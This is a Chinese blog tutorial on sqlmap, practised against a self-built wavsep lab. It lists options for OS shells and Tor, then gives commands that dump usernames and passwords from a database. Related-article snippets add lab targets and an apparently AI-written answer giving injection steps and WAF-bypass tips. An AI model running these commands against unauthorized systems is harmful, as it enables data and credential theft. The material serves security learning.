sqlmap注入使用教程

最新推荐文章于 2024-03-15 12:56:57 发布
最新推荐文章于 2024-03-15 12:56:57 发布
阅读量8.8w 收藏 205
点赞数 35
分类专栏: web安全 文章标签: sqlmap教程 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq1124794084/article/details/77851094
版权

最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。

首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases

一、sqlmap选项

  目标:至少要选中一个参数
    -u URL, --url=URL   目标为 URL (例如. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       将谷歌dork的结果作为目标url
  请求:
    这些选项可用于指定如何连接到目标URL
    --data=DATA         数据字符串通过POST发送
    --cookie=COOKIE     HTTP Cookie的值
    --random-agent      随机选择 HTTP User-Agent 头的值
    --proxy=PROXY       使用代理去连接目标URL
    --tor               使用匿名网络
    --check-tor         检查Tor是否正确使用
  注入:
    这些选项可用于指定要测试哪些参数,提供自定义注入负载和可选篡改脚本
    -p TESTPARAMETER    可测试的参数
    --dbms=DBMS         将后端DBMS强制到此值
  检测:
    这些选项可用于定制检测阶段
    --level=LEVEL       执行的测试级别(1-5, 默认 1)
    --risk=RISK         执行测试的风险 (1-3, 默认 1)
  技术:
    这些选项可用于调整特定SQL注入的测试的技术
    --technique=TECH    SQL注入技术选择 (默认 "BEUSTQ")
  枚举:
    T这些选项可用于枚举后端数据库管理系统的信息、结构和数据表。此外,还可以运行自己的SQL语句
    -a, --all           检索全部
    -b, --banner        检索 banner
    --current-user      检索当前用户
    --current-db        检索当前数据库
    --passwords         列出用户密码的hash值
    --tables            列出表
    --columns           列出字段
    --schema            列出DBMS schema
    --dump              Dump DBMS数据库表的条目
    --dump-all          Dump 所有DBMS数据库表的条目
    -D DB               指定数据库
    -T TBL              指定表
    -C COL              指定字段
  操作系统访问:
    这些选项可用于访问后端数据库管理系统底层操作系统
    --os-shell          提示为交互式操作系统shell
    --os-pwn            提示为OOB外壳,Meterpreter或VNC
  通用:
    这些选项可用于设置一些通用的工作参数
    --batch             永远不要要求用户输入,使用默认行为
    --flush-session     刷新当前目标的会话文件
  杂项:
    --sqlmap-shell      提示输入交互式sqlmap shell
    --wizard            初学者的简单向导界面


二、sqlmap使用

1.对url进行检测,判断是否存在SQL注入

python sqlmap.py -u "url" --batch


跑完以后发现存在注入,,参数是username 注入类型为盲注,数据库是mysql,后端语言是jsp

2.获取数据库

python sqlmap.py -u URL --dbs --batch 获取全部数据库

python sqlmap.py -u URL --current-db --batch 获取当前数据库


获取到了当前的数据库为 wavsepDB


3.获取当前数据库里所有表

python sqlmap.py -u URL -D wavsepDB --tables --batch



4.获取表的字段

python sqlmap.py -u URL -D wavsepDB -T users --columns --batch


如图获取到上面字段以后,我们就开始dump字段内容了。

5.dump字段内容

python sqlmap.py -u URL -D wavsepDB -T users -C "password,username" --dump --batch

如果字段内容多的话可以再加上如 --start 1 --stop 100 这样就取1-100条数据

--dump 可以换成 --dump-all则导出全部的内容



目前这个只是最常规的使用,还得多多练习。


史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQLSQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入
SQLmap使用教程图文教程(超详细)
2401_84969692的博客
05-13 2855
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQL注入Sqlmap使用指南(手把手保姆版)持续更新
热门推荐
开水的博客
03-15 5万+
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
sqlmap注入工具----一次简单的注入(实战)
weixin_33675507的博客
08-20 781
最近在学习网络安全,挖洞避免不了要使用许多工具,使用著名注入工具sqlmap的时候,对于英语不怎么好的我就比较难受了,本来就不会使用,加之又是英语的,简直难受。上网找了好多详细教程,但是命令实在是太多,感觉自己不可能一下就全部学会,于是决定一点一点慢慢来,用实战来慢慢熟悉这个工具的使用-----我相信通过每一次的记录我会慢慢变强! 这是墨者学院一个SQL注入漏洞靶场:http://219....
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4738
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
sql注入之——sqlmap教程
JieDG的博客
05-16 464
一、指定注入点 -u:指定注入点url 需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下: C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch 二、暴库 一条命令即可曝出该sqlserver中所有数据库名称,命令如下: C:\Python27\sqlmap>python sqlmap.py -u "http://
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 4462
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
SQL注入sqlmap入门教程
m0_56634355的博客
04-09 9422
sqlmapsql注入必备的也是最常用的工具,是每一位白帽子在的利器之一。
sqlmap注入实战教程(图文详解)
weixin_49071539的博客
12-18 2万+
教程使用靶场实战演示,仅供学习未经授权切勿用于非法用途 ! 1.发现此网址可能存在sql注入漏洞,我们进行sql注入测试一下是否存在漏洞。 地址栏输入 and 1=1 发现页面正常显示。 再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞 2.现在拿出我们的kali工具,sqlmap进行注入测试。 sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs 3.可以看到存在注入漏洞,扫到了5个数据库。要获.
SQLMAP 注入教程
General的 优快云 博客
11-15 5562
SQLMAP SQLMAP是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB,Informix,HSQLDB和H2数据库管理系统。 当给SQLMAP这么一个url的时候,它会: 判断可注入的参数 判断可以用那种SQL 注入技术来注入 识别出哪种数据
SQLmap的简单使用
11-03
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源自动化工具,目前支持的数据库是MySQL、Oracle、PostgreSQLSQL Server、Access、DB2、SQLite、Sybase等。没有图形化界面,通过命令行进行操作。sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫除sql注入点。下面简单介绍一下sqlmap使用
sql注入入门教程(附源码分析)
03-07
主要是对sql基本原理,加部分sqlmap源码分析
给大家发一个SQL注入实战教程
Y7967
12-24 4045
(大家可以用GOOGLE搜索,www.jinshouzhi.org有得下)这篇文章是去年10月份发的,我今年3月份才发现,这么长时间以来我的网站www.shbbs.net一直被当作教程攻击,呵呵,晕死。直到有一个好心网友提醒我我才做了一些处理。大家不要再按教程上直接使用攻击我的网站www.shbbs.net了,呵呵我已经打了预防针了:)找别人的去演习吧:)以下是文章部分,还有动画教程
SQLmap注入教程
明哥哥知识分享
08-14 931
一次sqlmap注入点并且dump出账号密码全程 判断注入点:sqlmap.py -u “存在注入url” 爆出所有数据库名字:sqlmap.py -u “存在注入url” --dbs 查看当前使用账号:sqlmap.py -u “存在注入url” --current-user 1、查看当前数据库:sqlmap.py -u “存在注入url” --current-db 2、列出数据库中所有表:sqlmap.py -u “存在注入url”-D “当前数据库名” --tables。解释说明:-D是指定数据库
sqlmap简单使用
qq_44704184的博客
04-01 2943
sqllabs靶场第二关为例 1、手工注入注入点,发现参数id,上sqlmap 2、查询数据库 python sqlmap.py -u"http://localhost/sqli-labs-master/Less-2/index.php?id=1" --dbs 3、查询security数据库 python sqlmap.py -u"http://localhost/sqli-labs-master/Less-2/index.php?id=1" --tables -D security 4、查询u
掌握SQL注入利器:SQLMap使用入门教程及技巧分享
Hanko的专栏
06-14 1624
使用 SQLMap 之前,你需要识别目标应用程序的 URL 或请求中的参数,这些参数可能存在 SQL 注入漏洞。SQLMap 是一个功能强大的自动化 SQL 注入工具,它可以用于检测和利用 SQL 注入漏洞。首先,你需要从 SQLMap 的官方网站下载并安装 SQLMap 工具。根据你的操作系统选择适当的版本,并按照官方提供的安装说明进行安装。如request.txt。可以看到已经打印出数据库名称,如果是--dump命令打印的就是数据库表中的数据。
SQL 注入教程
weixin_30810239的博客
11-10 205
SQL 注入测评教程 1 准备 安装包:Burpsuit、Python27、sqlmap 2 安装配置 2.1 Burpsuit 1) 解压Burpsuit 2) 双击运行BurpUnlimited.jar(注:该工具基于java,提前安装好java运行环境) 3) 设置,如图所示 ...
sqlmap注入教程
最新发布
03-10
<think>好的,我现在需要帮助用户查找关于使用sqlmap进行SQL注入攻击的教学资料。用户已经提供了一些相关的引用内容,我需要结合这些资料来整理出一个清晰的回答。 首先,我得先理解用户的需求。他们想要一个教程,指导如何使用sqlmap进行SQL注入攻击。根据提供的引用,引用[1]和引用[4]直接提到了sqlmap的基本使用方法和步骤,而引用[2]和引用[3]则涉及具体的SQL注入案例,比如Access数据库和DVWA的示例。这些内容可以作为回答的基础。 接下来,我需要组织回答的结构。用户要求结构清晰,逐步解决问题,所以可能需要分步骤讲解sqlmap使用流程。同时,根据系统级指令,需要生成相关问题,并在回答中引用给定的参考资料。还要注意使用正确的LaTeX格式,不过在这个问题中可能数学公式较少,但如果有变量或代码的话,要正确使用$...$或$$...$$。 然后,我需要确保引用的正确性。比如,引用[1]提到了sqlmap支持的数据库类型,引用[4]提到了下载和基本命令,引用[2]和引用[3]提供了实际注入的例子。在回答的不同部分,如安装步骤、基本命令、实际案例中,需要自然地插入引用标识。 另外,用户可能对如何判断注入点、绕过防护机制、实际案例应用等有进一步的问题,所以生成的相关问题要覆盖这些方面。需要确保每个引用都被正确使用,比如在提到Access数据库注入时引用[2],在提到DVWA时引用[3]。 还要注意用户提到的中文回答,以及LaTeX的正确使用。例如,如果有变量或代码内联,需要用$...$,但在这个回答中可能大部分是命令行示例,所以需要正确使用代码块,并注意语法正确性。 最后,检查是否遗漏了用户提供的任何引用,确保所有相关信息都被涵盖,并且回答逻辑流畅,步骤明确,帮助用户逐步理解和应用sqlmap进行SQL注入测试。</think>### SQLmap使用教程SQL注入攻击步骤 SQLmap是一款自动化SQL注入工具,支持检测和利用多种数据库的注入漏洞(如MySQL、Oracle、Access等)[^1]。以下是其核心使用方法和攻击流程: --- #### 一、环境准备 1. **安装SQLmap** - 从官网下载并解压sqlmap文件[^4]: ```bash wget https://sqlmap.org/sqlmap.zip unzip sqlmap.zip ``` - 运行依赖Python环境: ```bash python sqlmap.py -h ``` --- #### 二、基础命令与注入流程 1. **目标探测** - 指定目标URL检测注入点[^3]: ```bash python sqlmap.py -u "http://example.com/page?id=1" ``` - 若需POST请求,添加`--data`参数: ```bash python sqlmap.py -u "http://example.com/login" --data="username=admin&password=123" ``` 2. **数据库指纹识别** - 获取数据库类型和版本: ```bash python sqlmap.py -u [URL] --banner ``` 3. **注入点利用** - 爆出数据库名称[^2]: ```bash python sqlmap.py -u [URL] --dbs ``` - 指定数据库并列举表名: ```bash python sqlmap.py -u [URL] -D [数据库名] --tables ``` 4. **数据提取** - 导出表中字段内容: ```bash python sqlmap.py -u [URL] -D [数据库名] -T [表名] --dump ``` --- #### 三、高级技巧与绕过防护 1. **绕过WAF** 使用随机化User-Agent或代理: ```bash python sqlmap.py -u [URL] --random-agent --proxy="http://127.0.0.1:8080" ``` 2. **联合查询注入** 手动判断字段数后执行联合查询: ```bash python sqlmap.py -u [URL] --union-cols=3 ``` --- #### 四、实战案例参考 1. **Access数据库注入** 通过联合查询爆出字段数据(如凡诺系统案例)。 2. **DVWA靶场测试** 利用DVWA低安全级别环境练习注入[^3]。 ---
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值